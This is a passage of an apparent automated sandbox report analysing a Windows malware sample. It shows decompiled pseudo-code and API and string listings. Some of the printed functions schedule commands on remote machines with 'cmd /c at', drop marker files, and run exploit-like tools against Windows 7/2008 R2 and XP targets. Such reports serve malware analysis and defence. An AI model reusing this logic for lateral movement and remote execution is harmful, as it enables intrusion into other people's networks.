                                                																	goto L84;
                                                																} else {
                                                																	goto L72;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
                                                											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
                                                												goto L62;
                                                											} else {
                                                												goto L19;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}

                                                0x009726dc
                                                0x009726dc
                                                0x009726de
                                                0x009726e1
                                                0x009726ea
                                                0x009726ef
                                                0x009726f2
                                                0x009726f4
                                                0x00000000
                                                0x00000000
                                                0x009726fc
                                                0x009726fd
                                                0x00972700
                                                0x00972703
                                                0x00972705
                                                0x00972708
                                                0x0097270b
                                                0x00000000
                                                0x00000000
                                                0x0097270d
                                                0x00972711
                                                0x00972711
                                                0x00000000
                                                0x00972711
                                                0x0097270f
                                                0x00000000
                                                0x0097270f
                                                0x00972714
                                                0x00972714
                                                0x00972717
                                                0x0097271a
                                                0x0097271d
                                                0x0097271d
                                                0x0097271d
                                                0x009726ca
                                                0x0097272a
                                                0x0097272a
                                                0x009725ee
                                                0x009725fd
                                                0x00972602
                                                0x00972605
                                                0x00972608
                                                0x0097260d
                                                0x0097260f
                                                0x0097260f
                                                0x00972612
                                                0x00972615
                                                0x00972618
                                                0x00972624
                                                0x0097262d
                                                0x00972642
                                                0x00972648
                                                0x0097264a
                                                0x00972650
                                                0x00972652
                                                0x00972657
                                                0x0097266c
                                                0x00972671
                                                0x00972674
                                                0x00972677
                                                0x00972677
                                                0x0097262f
                                                0x00972636
                                                0x0097263d
                                                0x00972640
                                                0x00000000
                                                0x00000000
                                                0x00972640
                                                0x0097267a
                                                0x0097267a
                                                0x0097267d
                                                0x0097267e
                                                0x00972681
                                                0x00972684
                                                0x00972615
                                                0x00000000
                                                0x0097260d
                                                0x0097259f
                                                0x009725a1
                                                0x009725a7
                                                0x009725b1
                                                0x00000000
                                                0x009725c3
                                                0x009725d4
                                                0x009725d9
                                                0x009725de
                                                0x00972688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009725de
                                                0x009725b1
                                                0x0097259d
                                                0x00972589
                                                0x00972329
                                                0x009722f3
                                                0x009722f3
                                                0x009722f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722f7
                                                0x009722d0
                                                0x009722c4
                                                0x009722a5
                                                0x00972296
                                                0x0097226d
                                                0x00972263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00972320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0097239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00972419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0097249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 009724CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0097251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0097253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00972555
                                                • _UnwindNestedFrames.LIBCMT ref: 0097255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00972569
                                                • CallUnexpected.LIBVCRUNTIME ref: 00972574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: f0b01a2c61fd9217fd897e0e4a66776608c373cadfb862bb3540ebd812cf70b0
                                                • Instruction ID: ef695685d70bcd686a6bd916758fca57f1c6ab9ce57791d482c691bf1f2265ec
                                                • Opcode Fuzzy Hash: f0b01a2c61fd9217fd897e0e4a66776608c373cadfb862bb3540ebd812cf70b0
                                                • Instruction Fuzzy Hash: 3DB1DC72810209EFCF24DFA5C841BAEBBB9BF58314F14C149E85967262C735EA41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E0096A760(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, struct _SYSTEMTIME _a16, signed short _a24, signed short _a26, short _a30, short _a32, char _a40, char _a80, short _a608, char _a616, char _a624, short _a1120, char _a1128, char _a1664, short _a3712, char _a3720, signed int _a5740, signed int _a5772) {
                                                				void* __esi;
                                                				signed int _t33;
                                                				signed char _t35;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t77;
                                                				WCHAR* _t97;
                                                				void* _t101;
                                                				void* _t103;
                                                				signed int _t104;
                                                				signed int _t105;
                                                
                                                				_t105 = _t104 & 0xfffffff8;
                                                				E00983CA0();
                                                				_t33 =  *0x98f008; // 0x35554c2f
                                                				_a5740 = _t33 ^ _t105;
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_t97 = __ecx;
                                                				_t77 = __edx;
                                                				_t35 = GetFileAttributesW(__ecx);
                                                				if(_t35 == 0xffffffff || (_t35 & 0x00000010) == 0) {
                                                					L7:
                                                					_pop(_t101);
                                                					return E00970A5D(_a5740 ^ _t105, _t101);
                                                				} else {
                                                					E00973440(_t97,  &_a80, 0, 0x208);
                                                					_t105 = _t105 + 0xc;
                                                					E0096A210(_t97,  &_a80);
                                                					if(E0096A3B0(_t77,  &_a80,  &_a80, _t97) == 0) {
                                                						goto L7;
                                                					} else {
                                                						E00973440(_t97,  &_a1120, 0, 0x208);
                                                						wsprintfW( &_a1120, L"%ws\\%ws",  &_a80, L"Microsoft.ini");
                                                						_t48 = E0096A630("CONFIGURATION", 0xd,  &_a1128);
                                                						_t105 = _t105 + 0x20;
                                                						if(_t48 == 0) {
                                                							goto L7;
                                                						} else {
                                                							E00973440(_t97,  &_a608, 0, 0x208);
                                                							wsprintfW( &_a608, L"%ws\\%ws", _t97, 0x996838);
                                                							_t54 = E0096A630( *0x996a44,  *0x996a40,  &_a616);
                                                							_t105 = _t105 + 0x20;
                                                							if(_t54 == 0) {
                                                								goto L7;
                                                							} else {
                                                								asm("xorps xmm0, xmm0");
                                                								_a16.wYear = 0;
                                                								_a26 = 0;
                                                								_a30 = 0;
                                                								asm("movq [esp+0x16], xmm0");
                                                								GetLocalTime( &_a16);
                                                								E00973440(_t97,  &_a32, 0, 0x40);
                                                								wsprintfW( &_a32, L"%02d:%02d", _a24 & 0x0000ffff, (_a26 & 0x0000ffff) + 3);
                                                								E00973440(_t97,  &_a1664, 0, 0x800);
                                                								_t105 = _t105 + 0x28;
                                                								if(E0096A6C0( &_a624,  &_a1664) == 0) {
                                                									goto L7;
                                                								} else {
                                                									E00973440(_t97,  &_a3712, 0, 0x800);
                                                									wsprintfW( &_a3712, L"cmd /c at \\\\%ws %ws \"%ws\"", _t77,  &_a40,  &_a1664);
                                                									E0096A330( &_a3720);
                                                									_pop(_t103);
                                                									return E00970A5D(_a5772 ^ _t105 + 0x20, _t103);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,?,00995480,00995480,?,0096AA18), ref: 0096A786
                                                  • Part of subcall function 0096A3B0: wsprintfW.USER32 ref: 0096A3F6
                                                  • Part of subcall function 0096A3B0: wsprintfW.USER32 ref: 0096A421
                                                  • Part of subcall function 0096A3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096A442
                                                  • Part of subcall function 0096A3B0: CloseHandle.KERNEL32(00000000), ref: 0096A454
                                                  • Part of subcall function 0096A3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0096A4E7
                                                  • Part of subcall function 0096A3B0: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0096A50A
                                                  • Part of subcall function 0096A3B0: CloseHandle.KERNEL32(00000000), ref: 0096A515
                                                • wsprintfW.USER32 ref: 0096A801
                                                  • Part of subcall function 0096A630: CreateFileW.KERNEL32(0096A81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A,?), ref: 0096A655
                                                • wsprintfW.USER32 ref: 0096A84F
                                                  • Part of subcall function 0096A630: WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A67B
                                                  • Part of subcall function 0096A630: CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A687
                                                • GetLocalTime.KERNEL32(?), ref: 0096A893
                                                • wsprintfW.USER32 ref: 0096A8C3
                                                • wsprintfW.USER32 ref: 0096A925
                                                  • Part of subcall function 0096A330: CreateProcessW.KERNEL32 ref: 0096A384
                                                  • Part of subcall function 0096A330: WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0096A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Filewsprintf$Create$CloseHandle$Time$AttributesLocalObjectProcessSingleWaitWrite
                                                • String ID: %02d:%02d$%ws\%ws$/LU5/$CONFIGURATION$Microsoft.ini$cmd /c at \\%ws %ws "%ws"
                                                • API String ID: 596974635-2542409952
                                                • Opcode ID: 4bd296249048b5e8ddbb2ca54e7a4aa04e3efc2e655cc8cfa64bab92f442639f
                                                • Instruction ID: bd53b2f4d4f96d7fa8fdb7f55036af494f36950417a340fbf74b6364ed9c1dcf
                                                • Opcode Fuzzy Hash: 4bd296249048b5e8ddbb2ca54e7a4aa04e3efc2e655cc8cfa64bab92f442639f
                                                • Instruction Fuzzy Hash: 3D41B9B25583445BD620EB64DC46FDB73DCAFC4708F04492AF59CE7281EA71A6098BA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00967980(void* __ebx, void* __edi, intOrPtr _a4) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v102420;
                                                				intOrPtr _v102424;
                                                				intOrPtr* _v102428;
                                                				intOrPtr* _v102432;
                                                				struct _CRITICAL_SECTION _v102456;
                                                				long _v102460;
                                                				long _v102464;
                                                				void* _v102468;
                                                				char _v102472;
                                                				void* __esi;
                                                				signed int _t41;
                                                				signed int _t42;
                                                				void* _t46;
                                                				void* _t60;
                                                				void* _t69;
                                                				intOrPtr* _t89;
                                                				intOrPtr _t90;
                                                				void* _t104;
                                                				void* _t111;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				intOrPtr _t115;
                                                				void* _t116;
                                                				intOrPtr* _t117;
                                                				signed int _t118;
                                                				void* _t119;
                                                				void* _t120;
                                                				void* _t122;
                                                
                                                				_push(0xffffffff);
                                                				_push(E0098463B);
                                                				_push( *[fs:0x0]);
                                                				E00983CA0();
                                                				_t41 =  *0x98f008; // 0x35554c2f
                                                				_t42 = _t41 ^ _t118;
                                                				_v20 = _t42;
                                                				_push(_t42);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t115 = _a4;
                                                				_v102424 = _t115;
                                                				if(_t115 == 0) {
                                                					L15:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t116);
                                                					return E00970A5D(_v20 ^ _t118, _t116);
                                                				}
                                                				_t46 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0);
                                                				_t127 = _t46 - 0xffffffff;
                                                				if(_t46 == 0xffffffff) {
                                                					goto L15;
                                                				}
                                                				CloseHandle(_t46);
                                                				_t89 = E00970A6E(_t115, _t127, 0x214);
                                                				_t120 = _t119 + 4;
                                                				_v102432 = _t89;
                                                				 *_t89 = 0x98cac0;
                                                				E00968E80();
                                                				_t111 = 0;
                                                				_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_t115, 0x921e);
                                                				if(_t117 != 0) {
                                                					L5:
                                                					E00973440(_t111,  &_v102420, 0, 0x19000);
                                                					_v102472 = 0x98cab8;
                                                					_v102460 = 0;
                                                					_v102468 = 0;
                                                					_v102464 = 0;
                                                					InitializeCriticalSection( &_v102456);
                                                					_v8 = 0;
                                                					_t112 = E00970A6E(_t117, _t130, 0x21c);
                                                					_v102428 = _t112;
                                                					 *_t112 = _t117;
                                                					_t17 = _t112 + 4; // 0x4
                                                					 *(_t112 + 0x214) = 0;
                                                					 *((char*)(_t112 + 0x218)) = 0;
                                                					E00973440(_t112, _t17, 0, 0x10c);
                                                					_t20 = _t112 + 0x110; // 0x110
                                                					E00975C70(_t20, 0x104, "C:\\Windows\\system32\\msvcwme.log");
                                                					_t122 = _t120 + 0x28;
                                                					_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
                                                					if(_t60 == 0xffffffff) {
                                                						L12:
                                                						 *((intOrPtr*)( *_t117 + 0x18))();
                                                						E00970AA1(_t112);
                                                						 *((intOrPtr*)( *_t89))(1, 0x21c);
                                                						 *((intOrPtr*)( *_t117))(1);
                                                						_push(1);
                                                						E00970AA1(_v102424);
                                                						_t69 = _v102468;
                                                						_v102472 = 0x98cab8;
                                                						if(_t69 != 0) {
                                                							VirtualFree(_t69, 0, 0x8000);
                                                						}
                                                						DeleteCriticalSection( &_v102456);
                                                						goto L15;
                                                					}
                                                					_t113 = Sleep;
                                                					_t90 = _v102428;
                                                					do {
                                                						if(_t60 <= 0) {
                                                							goto L10;
                                                						}
                                                						E00973440(_t113,  &_v102420, 0, 0x19000);
                                                						_t122 = _t122 + 0xc;
                                                						_push(0x19000);
                                                						_push( &_v102420);
                                                						if( *((intOrPtr*)( *_t117 + 0x14))() <= 0) {
                                                							break;
                                                						}
                                                						E00968BB0(_t90, _t90, _t113,  &_v102472,  &_v102420, _t76);
                                                						L10:
                                                						Sleep(0xa);
                                                						_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
                                                					} while (_t60 != 0xffffffff);
                                                					_t89 = _v102432;
                                                					_t112 = _v102428;
                                                					goto L12;
                                                				} else {
                                                					goto L3;
                                                				}
                                                				while(1) {
                                                					L3:
                                                					_t104 = _t111;
                                                					_t111 = _t111 + 1;
                                                					if(_t104 >= 5) {
                                                						break;
                                                					}
                                                					Sleep(0xbb8);
                                                					_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_v102424, 0x921e);
                                                					_t130 = _t117;
                                                					if(_t117 == 0) {
                                                						continue;
                                                					}
                                                					goto L5;
                                                				}
                                                				E00970AA1(_v102424);
                                                				 *((intOrPtr*)( *_t89))(1, 1);
                                                				__eflags = _t117;
                                                				if(_t117 != 0) {
                                                					 *((intOrPtr*)( *_t117))(1);
                                                				}
                                                				goto L15;
                                                			}

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000,35554C2F,?,?,?,?,0098463B,000000FF), ref: 009679D7
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0098463B,000000FF), ref: 009679E7
                                                • new.LIBCMT ref: 009679F2
                                                  • Part of subcall function 00968E80: WSAStartup.WS2_32(00000202,35554C2F), ref: 00968EA3
                                                • Sleep.KERNEL32(00000BB8), ref: 00967A33
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00967A96
                                                • new.LIBCMT ref: 00967AA8
                                                • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,0000010C,0000021C), ref: 00967B59
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 00967BC4
                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 00967BD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSectionSleep$CloseCreateDeleteFileFreeHandleInitializeStartupVirtual
                                                • String ID: /LU5/$C:\Windows\system32\msvcwme.log
                                                • API String ID: 1876426310-1836764948
                                                • Opcode ID: 3216d4870241e0e7bc39f00f051f3af4d971a997a81d0236476d008089d8ba59
                                                • Instruction ID: 5ed5bf7a780ebc63059044a77cdfc0fba497be503c07736e1aeab2db568be0d8
                                                • Opcode Fuzzy Hash: 3216d4870241e0e7bc39f00f051f3af4d971a997a81d0236476d008089d8ba59
                                                • Instruction Fuzzy Hash: 14718571A40614AFDB21DF64CC59FDDB7B8BF48B14F1105A4F609AB3D1C7B09A448B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00967720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				char _v1048;
                                                				char _v1308;
                                                				char _v1568;
                                                				signed int _t26;
                                                				signed int _t56;
                                                				signed int _t65;
                                                				void* _t77;
                                                				void* _t99;
                                                				void** _t101;
                                                				void* _t102;
                                                				void* _t103;
                                                				void* _t104;
                                                				signed int _t105;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				void* _t111;
                                                				void* _t112;
                                                
                                                				_t100 = __esi;
                                                				_t26 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t26 ^ _t105;
                                                				_t99 = __edx;
                                                				_t77 = __ecx;
                                                				E00973440(__edx,  &_v1048, 0, 0x104);
                                                				GetSystemDirectoryA( &_v1048, 0x104);
                                                				E00973440(_t99,  &_v268, 0, 0x104);
                                                				E00973440(_t99,  &_v788, 0, 0x104);
                                                				E00973440(_t99,  &_v1308, 0, 0x104);
                                                				E00973440(_t99,  &_v1568, 0, 0x104);
                                                				E00973440(_t99,  &_v528, 0, 0x104);
                                                				E00965180( &_v268, 0x104, "%s\\process1.txt", _t99);
                                                				E00965180( &_v788, 0x104, "%s\\process2.txt", _t99);
                                                				_push( &_v268);
                                                				E00965180( &_v1308, 0x104, "/c %s\\svchost.exe > %s", _t99);
                                                				_push( &_v788);
                                                				E00965180( &_v1568, 0x104, "/c %s\\spoolsv.exe > %s", _t99);
                                                				E00965180( &_v528, 0x104, "%s\\cmd.exe",  &_v1048);
                                                				_t109 = _t106 + 0xa0;
                                                				if(E009671E0(_t99, _t99) != 0) {
                                                					_t56 = E009672D0(_t77, _t99, _t77, _t99, "WIN72K8R2");
                                                					_t110 = _t109 + 4;
                                                					__eflags = _t56;
                                                					if(__eflags == 0) {
                                                						goto L1;
                                                					} else {
                                                						_push(__esi);
                                                						while(1) {
                                                							_t101 = E00964F50( &_v528,  &_v1308, __eflags, _t99);
                                                							_t111 = _t110 + 4;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								break;
                                                							}
                                                							WaitForSingleObject( *_t101, 0x2bf20);
                                                							_push(0x10);
                                                							E00970AA1(_t101);
                                                							_t112 = _t111 + 8;
                                                							_t65 = E009675E0( &_v268);
                                                							__eflags = _t65;
                                                							if(_t65 != 0) {
                                                								__eflags = _t65 == 1;
                                                								if(_t65 == 1) {
                                                									break;
                                                								} else {
                                                									__eflags = E009673E0(_t77,  &_v268, _t99, _t99, _t101, _t77);
                                                									if(__eflags == 0) {
                                                										break;
                                                									} else {
                                                										__eflags = E00964FD0( &_v1568, __eflags, _t99);
                                                										if(__eflags == 0) {
                                                											break;
                                                										} else {
                                                											_t103 = E00970AB4(_t101, __eflags);
                                                											E00973440(_t99, _t103, 0, 0x80);
                                                											E00975C70(_t103, 0x80, _t77);
                                                											CreateThread(0, 0, E00967980, _t103, 0, 0);
                                                											Sleep(0x32);
                                                											_t104 = 0x80;
                                                											__eflags = _v8 ^ _t105;
                                                											return E00970A5D(_v8 ^ _t105, _t104);
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								E009672D0(_t77, _t99, _t77, _t99, "XP");
                                                								_t110 = _t112 + 4;
                                                								continue;
                                                							}
                                                							goto L12;
                                                						}
                                                						_pop(_t102);
                                                						__eflags = _v8 ^ _t105;
                                                						return E00970A5D(_v8 ^ _t105, _t102);
                                                					}
                                                				} else {
                                                					L1:
                                                					return E00970A5D(_v8 ^ _t105, _t100);
                                                				}
                                                				L12:
                                                			}

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0096775B
                                                • WaitForSingleObject.KERNEL32(00000000,0002BF20,00000000), ref: 009678A6
                                                • CreateThread.KERNEL32(00000000,00000000,00967980,00000000,00000000,00000000), ref: 00967947
                                                • Sleep.KERNEL32(00000032), ref: 0096794F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryObjectSingleSleepSystemThreadWait
                                                • String ID: %s\cmd.exe$%s\process1.txt$%s\process2.txt$/LU5/$/c %s\spoolsv.exe > %s$/c %s\svchost.exe > %s$WIN72K8R2
                                                • API String ID: 3526521245-1752958003
                                                • Opcode ID: aee249bc24ac1ffbb0878d388c71cdec1231b431972ce9e3c8d903e184b6eb80
                                                • Instruction ID: 0772d7b9cc4c91198275ce41e6424a9280bb9a9a556738e4d90610311288465b
                                                • Opcode Fuzzy Hash: aee249bc24ac1ffbb0878d388c71cdec1231b431972ce9e3c8d903e184b6eb80
                                                • Instruction Fuzzy Hash: 5151EBF2A4430C77DB24EBA09C47FDEB36C9BC5708F5040A5F64CA61C2DAB09B898751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E0097FB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                				signed int _v5;
                                                				char _v6;
                                                				void* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v36;
                                                				signed int _v44;
                                                				void _v48;
                                                				char _v72;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t114;
                                                				signed int _t123;
                                                				signed char _t124;
                                                				signed int _t134;
                                                				intOrPtr _t164;
                                                				intOrPtr _t180;
                                                				signed int* _t190;
                                                				signed int _t192;
                                                				char _t197;
                                                				signed int _t203;
                                                				signed int _t206;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t219;
                                                				signed int _t225;
                                                				signed int _t227;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed char _t242;
                                                				intOrPtr _t245;
                                                				void* _t248;
                                                				void* _t252;
                                                				void* _t262;
                                                				signed int _t263;
                                                				signed int _t266;
                                                				signed int _t269;
                                                				signed int _t270;
                                                				void* _t272;
                                                				void* _t274;
                                                				void* _t275;
                                                				void* _t277;
                                                				void* _t278;
                                                				void* _t280;
                                                				void* _t284;
                                                
                                                				_t262 = E0097F8D9(__ecx,  &_v72, _a16, _a20, _a24);
                                                				_t192 = 6;
                                                				memcpy( &_v48, _t262, _t192 << 2);
                                                				_t274 = _t272 + 0x1c;
                                                				_t248 = _t262 + _t192 + _t192;
                                                				_t263 = _t262 | 0xffffffff;
                                                				if(_v36 != _t263) {
                                                					_t114 = E0097BF6B(_t248, _t263, __eflags);
                                                					_t190 = _a8;
                                                					 *_t190 = _t114;
                                                					__eflags = _t114 - _t263;
                                                					if(_t114 != _t263) {
                                                						_v20 = _v20 & 0x00000000;
                                                						_v24 = 0xc;
                                                						_t275 = _t274 - 0x18;
                                                						 *_a4 = 1;
                                                						_push(6);
                                                						_v16 =  !(_a16 >> 7) & 1;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t275,  &_v48, 1 << 2);
                                                						_t197 = 0;
                                                						_t252 = E0097F844();
                                                						_t277 = _t275 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							L11:
                                                							_t123 = GetFileType(_t252);
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t123 - 2;
                                                								if(_t123 != 2) {
                                                									__eflags = _t123 - 3;
                                                									_t124 = _v48;
                                                									if(_t123 == 3) {
                                                										_t124 = _t124 | 0x00000008;
                                                										__eflags = _t124;
                                                									}
                                                								} else {
                                                									_t124 = _v48 | 0x00000040;
                                                								}
                                                								_v5 = _t124;
                                                								E0097BEB4(_t197,  *_t190, _t252);
                                                								_t242 = _v5 | 0x00000001;
                                                								_v5 = _t242;
                                                								_v48 = _t242;
                                                								 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                                								_t203 =  *_t190;
                                                								_t205 = (_t203 & 0x0000003f) * 0x30;
                                                								__eflags = _a16 & 0x00000002;
                                                								 *((char*)( *((intOrPtr*)(0x996480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                                								if((_a16 & 0x00000002) == 0) {
                                                									L20:
                                                									_v6 = 0;
                                                									_push( &_v6);
                                                									_push(_a16);
                                                									_t278 = _t277 - 0x18;
                                                									_t206 = 6;
                                                									_push( *_t190);
                                                									memcpy(_t278,  &_v48, _t206 << 2);
                                                									_t134 = E0097F5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                                									_t280 = _t278 + 0x30;
                                                									__eflags = _t134;
                                                									if(__eflags == 0) {
                                                										 *((char*)( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                                										 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                                										__eflags = _v5 & 0x00000048;
                                                										if((_v5 & 0x00000048) == 0) {
                                                											__eflags = _a16 & 0x00000008;
                                                											if((_a16 & 0x00000008) != 0) {
                                                												_t225 =  *_t190;
                                                												_t227 = (_t225 & 0x0000003f) * 0x30;
                                                												_t164 =  *((intOrPtr*)(0x996480 + (_t225 >> 6) * 4));
                                                												_t87 = _t164 + _t227 + 0x28;
                                                												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                                												__eflags =  *_t87;
                                                											}
                                                										}
                                                										_t266 = _v44;
                                                										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                                										if((_t266 & 0xc0000000) != 0xc0000000) {
                                                											L31:
                                                											__eflags = 0;
                                                											return 0;
                                                										} else {
                                                											__eflags = _a16 & 0x00000001;
                                                											if((_a16 & 0x00000001) == 0) {
                                                												goto L31;
                                                											}
                                                											CloseHandle(_v12);
                                                											_v44 = _t266 & 0x7fffffff;
                                                											_t215 = 6;
                                                											_push( &_v24);
                                                											_push(_a12);
                                                											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                                											_t245 = E0097F844();
                                                											__eflags = _t245 - 0xffffffff;
                                                											if(_t245 != 0xffffffff) {
                                                												_t217 =  *_t190;
                                                												_t219 = (_t217 & 0x0000003f) * 0x30;
                                                												__eflags = _t219;
                                                												 *((intOrPtr*)( *((intOrPtr*)(0x996480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                                												goto L31;
                                                											}
                                                											E00975D0D(GetLastError());
                                                											 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                											E0097C07D( *_t190);
                                                											L10:
                                                											goto L2;
                                                										}
                                                									}
                                                									_t269 = _t134;
                                                									goto L22;
                                                								} else {
                                                									_t269 = E0097FA55(_t205,  *_t190);
                                                									__eflags = _t269;
                                                									if(__eflags != 0) {
                                                										L22:
                                                										E0097A32C(__eflags,  *_t190);
                                                										return _t269;
                                                									}
                                                									goto L20;
                                                								}
                                                							}
                                                							_t270 = GetLastError();
                                                							E00975D0D(_t270);
                                                							 *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x996480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                							CloseHandle(_t252);
                                                							__eflags = _t270;
                                                							if(_t270 == 0) {
                                                								 *((intOrPtr*)(E00975D43())) = 0xd;
                                                							}
                                                							goto L2;
                                                						}
                                                						_t234 = _v44;
                                                						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                                						if((_t234 & 0xc0000000) != 0xc0000000) {
                                                							L9:
                                                							_t235 =  *_t190;
                                                							_t237 = (_t235 & 0x0000003f) * 0x30;
